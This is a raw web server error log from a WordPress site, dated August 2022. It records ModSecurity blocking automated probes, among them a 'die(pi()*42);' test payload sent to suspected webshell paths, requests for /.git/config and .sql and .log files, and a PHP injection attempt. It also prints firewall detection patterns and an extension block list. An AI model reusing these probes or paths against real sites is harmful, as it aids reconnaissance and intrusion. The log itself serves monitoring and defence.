"WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/assets/images/s_ne.php"] [unique_id "YuwuP600csLEBRN0NzPf_QAAAMU"] [Thu Aug 04 15:38:29.389303 2022] [:error] [pid 14210:tid 140391307228928] [client 152.89.196.102:57158] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/assets/images/s_ne.php"] [unique_id "YuwuRa00csLEBRN0NzPf_gAAAM0"] [Thu Aug 04 15:38:33.678352 2022] [:error] [pid 14210:tid 140391382763264] [client 152.89.196.102:57162] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/assets/images/s_ne.php"] [unique_id "YuwuSa00csLEBRN0NzPf_wAAAMQ"] [Fri Aug 05 18:47:53.853528 2022] [autoindex:error] [pid 4622:tid 140161585587968] [client 20.70.190.233:50884] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Aug 06 05:29:27.639545 2022] [autoindex:error] [pid 4031:tid 140029489837824] [client 20.70.185.38:37534] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Aug 06 21:30:34.171320 2022] [:error] [pid 3577:tid 140029363947264] [client 5.188.62.26:59598] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.sql"] [unique_id "Yu8jypzJrvYwglypkP3QegAAAJQ"] [Sun Aug 07 16:56:18.066151 2022] [autoindex:error] [pid 9249:tid 139892277290752] [client 5.161.108.251:54700] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2022/08/07 21:50:22 [error] 7518#7518: *359762 access forbidden by rule, client: 45.33.104.165, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/08/07 21:50:22 [error] 7518#7518: *359763 access forbidden by rule, client: 45.33.104.165, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/08/07 21:50:23 [error] 7519#7519: *359766 access forbidden by rule, client: 45.33.104.165, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/08/07 21:50:23 [error] 7518#7518: *359767 access forbidden by rule, client: 45.33.104.165, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/08/08 07:06:21 [error] 28805#28805: *366417 access forbidden by rule, client: 173.255.244.12, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/08/08 07:06:21 [error] 28805#28805: *366418 access forbidden by rule, client: 173.255.244.12, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/08/08 07:06:22 [error] 28806#28806: *366421 access forbidden by rule, client: 173.255.244.12, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/08/08 07:06:22 [error] 28805#28805: *366422 access forbidden by rule, client: 173.255.244.12, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Aug 08 22:15:11.957720 2022] [autoindex:error] [pid 29637:tid 139796202575616] [client 107.182.129.216:44498] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Aug 08 22:15:26.543843 2022] [:error] [pid 29637:tid 139796269717248] [client 107.182.129.216:44514] [client 107.182.129.216] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:l. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-plain.php"] [unique_id "YvHRTnxBII4zchKCSIdy8gAAAM8"] [Mon Aug 08 22:34:55.562248 2022] [:error] [pid 29637:tid 139796269717248] [client 152.89.196.102:44950] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/2022/02/s_e.php"] [unique_id "YvHV33xBII4zchKCSIdzNQAAAM8"] [Mon Aug 08 22:35:02.749097 2022] [:error] [pid 29637:tid 139796194182912] [client 152.89.196.102:44952] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/2022/02/s_e.php"] [unique_id "YvHV5nxBII4zchKCSIdzNgAAANg"] [Mon Aug 08 22:35:05.870060 2022] [:error] [pid 29637:tid 139796430554880] [client 152.89.196.102:44954] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/2022/02/s_e.php"] [unique_id "YvHV6XxBII4zchKCSIdzNwAAAMQ"] [Tue Aug 09 09:41:53.666564 2022] [:error] [pid 29373:tid 140372567037696] [client 206.189.206.213:35772] [client 206.189.206.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/debug.log"] [unique_id "YvJyMYfZxeIP9Uc1qostyQAAAJY"] [Tue Aug 09 09:41:53.681189 2022] [:error] [pid 29373:tid 140372634179328] [client 206.189.206.213:35774] [client 206.189.206.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/error.log"] [unique_id "YvJyMYfZxeIP9Uc1qostygAAAI4"] [Tue Aug 09 09:41:53.704373 2022] [:error] [pid 29373:tid 140372617393920] [client 206.189.206.213:35776] [client 206.189.206.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/access.log"] [unique_id "YvJyMYfZxeIP9Uc1qostywAAAJA"] [Tue Aug 09 12:41:06.164907 2022] [:error] [pid 29975:tid 140372642572032] [client 152.89.196.102:47588] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php:15 [Tue Aug 09 12:41:06.164996 2022] [:error] [pid 29975:tid 140372642572032] [client 152.89.196.102:47588] Stack trace: [Tue Aug 09 12:41:06.165007 2022] [:error] [pid 29975:tid 140372642572032] [client 152.89.196.102:47588] #0 {main} [Tue Aug 09 12:41:06.165101 2022] [:error] [pid 29975:tid 140372642572032] [client 152.89.196.102:47588] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php on line 15 [Tue Aug 09 12:41:07.757850 2022] [:error] [pid 29975:tid 140372667750144] [client 152.89.196.102:47590] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php:15 [Tue Aug 09 12:41:07.757935 2022] [:error] [pid 29975:tid 140372667750144] [client 152.89.196.102:47590] Stack trace: [Tue Aug 09 12:41:07.757945 2022] [:error] [pid 29975:tid 140372667750144] [client 152.89.196.102:47590] #0 {main} [Tue Aug 09 12:41:07.758036 2022] [:error] [pid 29975:tid 140372667750144] [client 152.89.196.102:47590] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php on line 15 [Tue Aug 09 12:41:08.993667 2022] [:error] [pid 29371:tid 140372642572032] [client 152.89.196.102:47592] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php:15 [Tue Aug 09 12:41:08.993740 2022] [:error] [pid 29371:tid 140372642572032] [client 152.89.196.102:47592] Stack trace: [Tue Aug 09 12:41:08.993750 2022] [:error] [pid 29371:tid 140372642572032] [client 152.89.196.102:47592] #0 {main} [Tue Aug 09 12:41:08.993861 2022] [:error] [pid 29371:tid 140372642572032] [client 152.89.196.102:47592] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php on line 15 [Tue Aug 09 13:28:57.037036 2022] [:error] [pid 29975:tid 140372592215808] [client 152.89.196.102:48854] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/easyrotator-for-wordpress/c.php"] [unique_id "YvKnacTVOPfEt2gKe1mT_gAAANM"] [Tue Aug 09 13:28:57.536217 2022] [:error] [pid 29975:tid 140372617393920] [client 152.89.196.102:48856] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/easyrotator-for-wordpress/c.php"] [unique_id "YvKnacTVOPfEt2gKe1mT_wAAANA"] [Tue Aug 09 13:28:57.864266 2022] [:error] [pid 29975:tid 140372609001216] [client 152.89.196.102:48858] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/easyrotator-for-wordpress/c.php"] [unique_id "YvKnacTVOPfEt2gKe1mUAAAAANE"] [Tue Aug 09 13:45:47.865004 2022] [:error] [pid 29373:tid 140372558644992] [client 152.89.196.102:49412] PHP Notice: Undefined index: wp_version in /home/investig/public_html/wp-content/themes/twentyseventeen/functions.php on line 15 [Tue Aug 09 13:45:47.865190 2022] [:error] [pid 29373:tid 140372558644992] [client 152.89.196.102:49412] PHP Fatal error: Uncaught Error: Call to undefined function get_template_directory() in /home/investig/public_html/wp-content/themes/twentyseventeen/functions.php:16 [Tue Aug 09 13:45:47.865204 2022] [:error] [pid 29373:tid 140372558644992] [client 152.89.196.102:49412] Stack trace: [Tue Aug 09 13:45:47.865213 2022] [:error] [pid 29373:tid 140372558644992] [client 152.89.196.102:49412] #0 {main} [Tue Aug 09 13:45:47.865284 2022] [:error] [pid 29373:tid 140372558644992] [client 152.89.196.102:49412] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/functions.php on line 16 [Tue Aug 09 13:45:50.405883 2022] [:error] [pid 29975:tid 140372550252288] [client 152.89.196.102:49414] PHP Notice: Undefined index: wp_version in /home/investig/public_html/wp-content/themes/twentyseventeen/functions.php on line 15 [Tue Aug 09 13:45:50.406084 2022] [:error] [pid 29975:tid 140372550252288] [client 152.89.196.102:49414] PHP Fatal error: Uncaught Error: Call to undefined function get_template_directory() in /home/investig/public_html/wp-content/themes/twentyseventeen/functions.php:16 [Tue Aug 09 13:45:50.406096 2022] [:error] [pid 29975:tid 140372550252288] [client 152.89.196.102:49414] Stack trace: [Tue Aug 09 13:45:50.406106 2022] [:error] [pid 29975:tid 140372550252288] [client 152.89.196.102:49414] #0 {main} [Tue Aug 09 13:45:50.406184 2022] [:error] [pid 29975:tid 140372550252288] [client 152.89.196.102:49414] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/functions.php on line 16 [Tue Aug 09 13:45:54.858907 2022] [:error] [pid 29975:tid 140372718106368] [client 152.89.196.102:49416] PHP Notice: Undefined index: wp_version in /home/investig/public_html/wp-content/themes/twentyseventeen/functions.php on line 15 [Tue Aug 09 13:45:54.859106 2022] [:error] [pid 29975:tid 140372718106368] [client 152.89.196.102:49416] PHP Fatal error: Uncaught Error: Call to undefined function get_template_directory() in /home/investig/public_html/wp-content/themes/twentyseventeen/functions.php:16 [Tue Aug 09 13:45:54.859126 2022] [:error] [pid 29975:tid 140372718106368] [client 152.89.196.102:49416] Stack trace: [Tue Aug 09 13:45:54.859138 2022] [:error] [pid 29975:tid 140372718106368] [client 152.89.196.102:49416] #0 {main} [Tue Aug 09 13:45:54.859216 2022] [:error] [pid 29975:tid 140372718106368] [client 152.89.196.102:49416] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/functions.php on line 16 [Tue Aug 09 13:49:35.964856 2022] [:error] [pid 29975:tid 140372709713664] [client 152.89.196.102:49540] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/menu_settings.php"] [unique_id "YvKsP8TVOPfEt2gKe1mUXgAAAMU"] [Tue Aug 09 13:49:37.361191 2022] [:error] [pid 29975:tid 140372701320960] [client 152.89.196.102:49544] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/menu_settings.php"] [unique_id "YvKsQcTVOPfEt2gKe1mUXwAAAMY"] [Tue Aug 09 13:49:38.198527 2022] [:error] [pid 29975:tid 140372642572032] [client 152.89.196.102:49546] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/menu_settings.php"] [unique_id "YvKsQsTVOPfEt2gKe1mUYAAAAM0"] [Tue Aug 09 14:06:36.577536 2022] [:error] [pid 29373:tid 140372692928256] [client 152.89.196.102:49966] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/custom-header.php:59 [Tue Aug 09 14:06:36.577632 2022] [:error] [pid 29373:tid 140372692928256] [client 152.89.196.102:49966] Stack trace: [Tue Aug 09 14:06:36.577664 2022] [:error] [pid 29373:tid 140372692928256] [client 152.89.196.102:49966] #0 {main} [Tue Aug 09 14:06:36.577760 2022] [:error] [pid 29373:tid 140372692928256] [client 152.89.196.102:49966] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/custom-header.php on line 59 [Tue Aug 09 14:06:41.749426 2022] [:error] [pid 29373:tid 140372701320960] [client 152.89.196.102:49970] PHP Fatal error: 